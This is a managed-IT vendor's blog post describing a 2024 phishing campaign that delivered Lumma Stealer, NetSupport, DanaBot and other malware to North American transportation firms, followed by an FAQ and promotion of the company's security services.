Cyberattacks Strike North American Transportation Companies Using Lumma Stealer and NetSupport Malware

Transportation and logistics companies across North America have fallen victim to a new wave of cyberattacks that have left them vulnerable to a range of malicious software. Recent reports from cybersecurity firm Proofpoint reveal that cybercriminals are leveraging a phishing campaign to target these industries, deploying a variety of information stealers and remote access trojans (RATs), including the notorious Lumma Stealer and NetSupport Manager malware.

These sophisticated attacks, which began in May 2024 and have continued into late August, highlight the increasing threat faced by critical infrastructure industries, including transportation, which are essential to the functioning of the global supply chain.

Phishing Campaign Exploiting Compromised Email Accounts

The attackers behind this campaign have utilized compromised legitimate email accounts belonging to transportation and shipping companies to inject malware into ongoing email threads. This tactic has proven to be particularly effective, as it lends legitimacy to the malicious emails, making it harder for recipients to detect the fraudulent nature of the communication. According to Proofpoint, as many as 15 email accounts have been breached and used as part of this ongoing attack.

Though the exact method by which these accounts were compromised remains unclear, it’s evident that the attackers are well-organized and sophisticated. The phishing emails typically contain .URL attachments or links to Google Drive, which lead to malicious files that activate once opened by unsuspecting users. The malware, once triggered, uses Server Message Block (SMB) to download additional payloads, further infiltrating the victim’s system.

Lumma Stealer, NetSupport Manager, and Evolving Tactics

Initially, from May to July 2024, the attackers predominantly relied on Lumma Stealer, StealC, and NetSupport Manager to carry out their attacks. Lumma Stealer is particularly dangerous as it is designed to exfiltrate sensitive information such as user credentials, banking details, and other personal data. NetSupport Manager, while initially a legitimate remote access tool, has been repurposed by the attackers as a trojan to take full control of the victim’s system remotely.

In August 2024, the cybercriminals updated their methods, using new infrastructure and delivery techniques. They also introduced new malware payloads, including DanaBot and Arechclient2, increasing the complexity and potential damage of their attacks. These new tactics make the threat even more dangerous, as they are designed to evade detection by conventional security systems.

One particularly concerning element of this new attack vector is the use of a method known as ClickFix. Victims are tricked into pasting a Base64-encoded PowerShell script into their terminal, initiating the download and installation of the DanaBot malware. This method exploits human error, preying on the victim’s trust in the malicious emails, which often impersonate well-known transportation management software providers such as Samsara, AMB Logistic, and Astra TMS.

Impact on the Transportation Industry

The transportation and logistics sectors have long been attractive targets for cybercriminals, given the critical role they play in the global economy. By disrupting operations or stealing sensitive data, cybercriminals can cause significant financial and operational damage to businesses. These industries rely on seamless coordination and communication, making any cyberattack particularly devastating.

The latest attack campaigns, focusing on companies involved in freight operations and fleet management, suggest that the attackers conduct extensive research on their targets, ensuring their phishing emails appear legitimate and relevant to the recipient. This targeting method increases the likelihood of success, as the victims are more likely to engage with the malicious content.

According to Proofpoint, the attackers behind this campaign may be financially motivated, seeking to steal valuable data that can be sold on dark web marketplaces. However, some researchers suggest that the evolving tactics and the introduction of espionage-related malware like RomCom RAT indicate that there may be broader motivations at play, such as espionage or sabotage.

Emerging Malware Threats: A Growing Concern

In addition to Lumma Stealer and NetSupport Manager, the transportation sector is facing a wave of emerging malware strains. These include Angry Stealer, BLX Stealer, and Gomorrah Stealer, among others. These new variants are designed to steal various types of sensitive data, ranging from login credentials to credit card information and cryptocurrency wallets.

Furthermore, the discovery of RomCom RAT—a sophisticated remote access trojan used in targeted espionage campaigns—adds another layer of complexity to the threat landscape. RomCom RAT allows attackers to execute commands, download additional malware, and even control the victim’s system entirely. Unlike earlier versions of the malware that were linked to ransomware campaigns, RomCom RAT appears to be focused on gathering intelligence, possibly indicating a shift toward cyber-espionage activities.

The threat posed by these new malware variants cannot be overstated, as they have the potential to disrupt critical infrastructure and steal invaluable data, leaving companies vulnerable to further attacks and financial losses.

How Technijian Can Help Protect Against These Threats

In light of these evolving threats, companies must take proactive steps to bolster their cybersecurity defenses. Technijian, a leading provider of managed IT and cybersecurity services, can help businesses protect themselves from the growing wave of cyberattacks.

Technijian offers a comprehensive suite of security solutions designed to address the unique challenges faced by the transportation and logistics sectors. These services include:

  • Advanced Email Security: By deploying cutting-edge email filtering and threat detection systems, Technijian can help businesses identify and block phishing attempts before they reach employees’ inboxes. These tools analyze incoming emails for malicious attachments, URLs, and suspicious behaviors, reducing the risk of successful phishing campaigns.
  • Endpoint Detection and Response (EDR): Technijian provides robust endpoint protection solutions that monitor and detect suspicious activities across all devices connected to a company’s network. By using EDR, businesses can quickly identify and respond to malware infections, minimizing damage and preventing the spread of malicious software.
  • Security Awareness Training: One of the most effective ways to prevent cyberattacks is through education. Technijian offers comprehensive security awareness training programs that teach employees how to recognize phishing attempts, avoid suspicious downloads, and safely navigate the digital landscape. This training empowers employees to become the first line of defense against cyber threats.
  • Incident Response Services: In the event of a security breach, Technijian provides expert incident response services. Their team of cybersecurity professionals can quickly assess the scope of the attack, mitigate the damage, and help businesses recover from the breach. This rapid response is critical in minimizing downtime and reducing financial losses.
  • Regular Security Audits and Vulnerability Assessments: To stay ahead of cybercriminals, businesses must regularly evaluate their security posture. Technijian’s security audits and vulnerability assessments help identify weak points in a company’s defenses, allowing for targeted improvements that fortify the organization against future threats.

By partnering with Technijian, transportation and logistics companies can significantly reduce their risk of falling victim to cyberattacks. Technijian’s expertise and comprehensive approach to cybersecurity ensure that businesses have the tools and knowledge needed to protect their operations and maintain the trust of their customers.

FAQs

1. What is Lumma Stealer?
Lumma Stealer is an information-stealing malware designed to collect sensitive data, such as login credentials, personal information, and financial details from infected systems.

2. How does NetSupport Manager malware work?
NetSupport Manager is a legitimate remote access tool that has been repurposed by cybercriminals as a remote access trojan (RAT). It allows attackers to control a victim’s computer remotely, giving them access to sensitive data and the ability to execute commands.

3. What is ClickFix, and how does it trick users?
ClickFix is a phishing technique where users are tricked into copying and pasting a Base64-encoded PowerShell script into their terminal, unknowingly initiating the malware download and infection process.

4. How do attackers use compromised email accounts in these campaigns?
Attackers compromise legitimate email accounts from transportation companies and use them to send malicious content. This tactic increases the likelihood that recipients will trust and engage with the malicious emails.

5. What steps can transportation companies take to protect themselves from these attacks?
Companies can protect themselves by implementing advanced email security measures, conducting regular security audits, providing employee training on phishing risks, and using endpoint detection and response systems.

6. How can Technijian help businesses protect against these types of cyberattacks?
Technijian offers a range of cybersecurity services, including email security, endpoint protection, incident response, and security awareness training. These services are designed to help businesses prevent, detect, and respond to cyber threats effectively.

Conclusion

The recent surge in cyberattacks targeting transportation companies is a stark reminder of the importance of robust cybersecurity measures. With the use of advanced malware like Lumma Stealer and NetSupport Manager, and the increasingly sophisticated phishing tactics employed by attackers, businesses must remain vigilant. By partnering with cybersecurity experts like Technijian, companies can ensure they are equipped to defend against these evolving threats and protect their critical operations.

About

Technijian is a premier provider of managed IT services in Orange County, delivering top-tier IT solutions designed to empower businesses to thrive in today’s fast-paced digital landscape. With a focus on reliability, security, and efficiency, we specialize in offering IT services that are tailored to meet the unique needs of businesses across Orange County and beyond.

Located in the heart of Irvine, Technijian has earned a reputation as a trusted partner for businesses seeking robust IT support in Irvine, Anaheim, Riverside, San Bernardino, and across Orange County. Our dedicated team of IT experts ensures that your technology infrastructure is always optimized, secure, and aligned with your business goals. Whether you require managed IT services in Irvine, IT consulting, or cloud services in Orange County, we’ve got you covered.

As a leader in IT support in Orange County, we understand the challenges businesses face when maintaining and advancing their IT environments. That’s why our comprehensive suite of services includes IT infrastructure management, IT support in Anaheim, IT help desk, and IT outsourcing services. With proactive monitoring, disaster recovery, and strategic consulting, our goal is to minimize downtime, enhance productivity, and provide IT security services that give you peace of mind.

At Technijian, we take pride in offering customized managed IT solutions that exceed client expectations. From small businesses to large enterprises, our IT services in Irvine are designed to scale with your needs and support your growth. We specialize in cloud servicesIT systems managementbusiness IT supporttechnology support servicesIT network management, and enterprise IT support. Whether you’re looking for IT support in RiversideIT solutions in San Diego, or managed IT services in Anaheim, Technijian has the expertise to meet your requirements.

Whether you need help with IT performance optimizationIT service management, or IT security solutions, we provide comprehensive services that enable businesses to remain agile in today’s competitive market. Our IT solutions provider services ensure your operations remain secure, productive, and future-ready.

Experience the difference with Technijian—your trusted partner for IT consulting servicesmanaged IT services, and IT support in Orange County. Let us guide you through the complexities of modern IT infrastructure and help you achieve your business objectives with confidence.  

Ravi JainAuthor posts

Technijian was founded in November of 2000 by Ravi Jain with the goal of providing technology support for small to midsize companies. As the company grew in size, it also expanded its services to address the growing needs of its loyal client base. From its humble beginnings as a one-man-IT-shop, Technijian now employs teams of support staff and engineers in domestic and international offices. Technijian’s US-based office provides the primary line of communication for customers, ensuring each customer enjoys the personalized service for which Technijian has become known.

Comments are disabled.